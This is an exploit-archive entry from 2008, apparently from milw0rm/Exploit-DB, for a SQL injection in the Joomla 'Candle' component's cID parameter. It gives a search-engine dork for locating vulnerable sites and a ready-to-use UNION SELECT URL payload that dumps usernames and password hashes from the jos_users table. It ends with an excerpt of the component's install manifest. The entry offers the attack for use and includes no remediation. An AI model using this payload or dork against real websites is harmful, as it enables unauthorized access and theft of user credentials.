Joomla! Component Candle 1.0 - 'cid' SQL Injection

EDB-ID:

5221

CVE:

N/A

Author:

S@BUN

Type:

webapps

Platform:

PHP

Published:

2008-03-08

#############################################
#
########### JOOMLA com_candle SQL Injection(cid)
#
#############################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
####
####MAiL : hackturkiye.hackturkiye@gmail.com
#
#############################################
#
##DORK 1 : allinurl:"com_candle"
#
#############################################
EXPLOIT :

index.php?option=com_candle&task=content&cID=-9999/**/union/**/select/**/0x3a,username,0x3a,password,0x3a,0x3a/**/from/**/jos_users/*

#############################################
################# S@BUN ####################
#############################################
######## hackturkiye.hackturkiye@gmail.com ######
#############################################

<mosinstall type="component" version="1.0.0">
	<name>Candle</name>
	<author>Son Vu</author>
	<creationDate>March 2007</creationDate>
	<copyright>(C) 2007 Open Source Matters. All rights reserved.</copyright>
	<license>http://www.gnu.org/copyleft/gpl.html GNU/GPL</license>

	<authorEmail>sora4g@gmail.com</authorEmail>
	<authorUrl></authorUrl>
	<version>1.0.0</version>
	<description>Candle Component.</description>

# milw0rm.com [2008-03-08]